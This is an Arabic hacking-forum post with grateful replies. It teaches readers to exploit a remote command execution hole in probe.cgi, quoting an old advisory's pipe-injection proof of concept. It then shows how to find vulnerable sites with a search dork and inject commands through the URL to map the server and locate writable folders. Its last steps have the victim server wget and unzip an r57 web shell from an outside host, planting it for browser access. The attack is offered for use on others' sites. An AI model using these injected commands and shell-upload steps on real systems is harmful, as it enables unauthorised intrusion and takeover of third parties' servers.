![]() |
فن التعامل مع ثغرات Remote command exucetion السلام عليكم ورحمة الله راح نشرح عمل نوع من الثغرات وهي ما تسمى (( Remote command exucetion )) وهي تسمح لك برفع شل او باكدور ,,,,,,الخ اول حاجه لازم يكون عندك شل مرفوع بموقعك او احد المواقع,,, طيب خلينا نجيب ثغره ونطبق عنونها كذا Probe.cgi Remote Command Execution يعني بملف Probe.cgi فيه ثغره رموت كومند حلو ...طيب خلونا نشوف الاكسبلويت --------------------------------------------------------- Authors ....... spher3 (spher3 at fatalimpulse dot net) Date .......... 04-07-2005 Product ....... probe.cgi Type .......... Remote Command Execution o Info: ================ That '''''''''''' is used to open file '.dat'. o Vulnerable Code: ================ .. 23 [...] 24 $old = $query->param('olddat'); 25 [...] .. .. 34 [...] 35 open (VF, "$olddat"); 36 [...] .. (24) At this line, the cgi param 'olddat' is associated to one database. This variable isnt checked by anyone matching, so you can open all file that you want. (35) At this line the '''''''''''' open the file that you had chosen. With pipe `|` is possible to execute arbitrary code on the ''''''''l. o Proof of concept: ================ http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id| uid=99(www) gid=99(www) -------------------------------------------------------------- لو تقراء باعلى موضح لك الملف ونوع الثغره,,,,,طيب احنا عوزين الاستثمار استثمارها هنا بالسطر كود: http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id| the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي cgi-bin<<===مجلد السيقيبين probe.cgi<<===الملف المصاب olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير =============== طيب نبغى نعرف كيف عملها اوكي اول تسوي بحث بالطريقه هذي allinurl:probe.cgi او اي طريقة تحب لنفرض اننا حصل موقع WWW.???.com/cgi.bin/probe.cgi?grid=ThaiGrid كويس اول حاجه نضع كود: |id| بيطلع بالشكل كود: WWW.???.com/cgi.bin/probe.cgi?grid=|id| واعطيه انتر بيظهر لك مثلا كذا كود: uid=99(www) gid=99(www) هذا صفتك بالسيرفر طيب نبغى ننعرفع ممكاننا وين ضع مكان الاي دي كود: pwd كود: WWW.???.com/cgi.bin/probe.cgi?grid=|pwd| بيطلع معك مثلا كود: /home/.???/cgi.bin طيب نبغى نشوف مسموح لينا نرفع ملف والا لا؟ ضع مكان الاي دي كود: which wget بالشكل,,,,,,,,, كود: WWW.???.com/cgi.bin/probe.cgi?grid=|which wget| اذا ضهر لك كدا كود: /؟؟؟/؟؟؟/wget وعلامة الاستفاهم متغير يعني اهم شي ويقت تظهر فاعرف انك الوضع زي الفل يعني مسموح لك ترفع ملف انبسط ياعم طيب نبغى نعرف التصاريح للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع لو ترجع احنا قلنا مكاننا وين هنا كود: /home/.???/cgi.bin طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري الرئيسي حلو نضع مكان الاي دي كود: cd /home/.???/;pwd يعني بيكون بالشكل كود: WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd| الان بيرجعنا الى كود: home/.???/ حلو الان نبغى نشوف المجلدات والمفات و التصريحات بالامر كود: ;ls%20-al بيطلع كذا,,,,, كود: WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al| بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم انت ابحث عن الملجلد اللي له التصريح كود: drwxrwxrwx لنفرض انك حصلت امام مجلد الصور او uploads اولا لازم نخش عليه تعمل كود: home/.???/uploads/;pwd كود: WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd| حلو بيكون وضعك بالشكل كود: home/.???/uploads/ يعني داخل مجلد uploads الان كل معليك رفع الشل طبعا لك شل مرفوع باحد المواقع يعني رابط شيلك كود: www.XXX.com/r57''''''''l.zip وتبغى ترفعه على الموقع المخترقه بالشكل,,,, كود: WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57''''''''l.zip*| واعطيه انتر بيظهر لك كود: r57''''''''l.zip طيب نبغى نفك الضغط عنه بالامر unzip كود: WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57''''''''l.zip*| وديلو انتر بيطلع معك كود: r57''''''''l.php والف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط WWW.???.com/uploads/r57''''''''l.php عموما ياجماعه الموضع كله انك تعرف كيف تتحرك وترفع ,,, وراح تكون الثغرات اسهل منها ما فيه والى اللقاء أخوكم super cristal |
شكرا علي المعلومات |
مشكور على ثغرة و شرح الجميل الى الامام اخي |
مشكووووووووووووووووووووووور حبيبي |
ان شاء الله نستفيد من معلوماتك القيمة وتقبل مروري تحياتي |
100% 100% تحياتي |
لووللووللووللووللووللوول |
يعطيك الف عافية |
مشكور على المعلومة القيمة |
يعطيك العافية بانتظار جديدك |
الساعة الآن 10:33 AM |
[ vBspiders.Com Network ]